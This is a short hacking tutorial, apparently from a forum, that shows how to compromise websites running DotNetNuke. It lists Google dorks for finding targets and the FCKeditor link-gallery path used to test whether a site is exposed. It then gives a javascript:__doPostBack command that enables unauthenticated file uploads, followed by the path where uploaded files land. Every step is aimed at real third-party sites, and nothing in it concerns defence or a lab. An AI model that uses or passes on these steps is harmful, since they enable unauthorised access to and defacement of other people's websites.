DNN (DotNetNuke) Hacking

Hacking Websites With DotNetNuke

Introduction
Today you will learn about a new web hacking technique known as DNN (standing for DotNetNuke). DNN is a new and growing form of hacking, that has recently become well known and popular. Its easy compared to hacking sites using SQLI, XSS, RFI etc.

In this lesson you will learn how to find your target, enter the website, and upload your files.

DotNetNuke is an open source platform for developing websites using Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.


Step 1: Google Dork
The first step is very easy. We simply use a Google Dork to find a target.
Two dorks are:

Code:

inurl:”/portals/0″ site:.com
inurl:/tabid/36/language/en-US/Default.aspx

(I'm assuming you already know how to use Google Dorks - if not, there is a guide here)
You can change the domain (.com) to something else, if you'd prefer.

Step 2: Check for the Vulnerability
Place the following after the web URL/address:

Code:

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

For example, if you found a target site called targetsite.com you would have:

Code:

www.targetsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

You should get a page something like this:


If you do, it means the site is vulnerable.

Step 3: Hacking the Site
Choose the third option (A File On Your Site) and then paste in the following JavaScript code to your address bar.

Code:

javascript:__doPostBack(‘ctlURL$cmdUpload’,”)

You will then be allowed to upload files on this website, you can upload txt, swf, jpg, gif, pdf files.

After uploading the files you're file will be found at domain/portals/0/yourfile.extension
Or in our case (if we uploaded a text file called "hax.txt"):

Code:

www.targetsite.com/portals/0/hax.txt

Congratulations! You hacked it!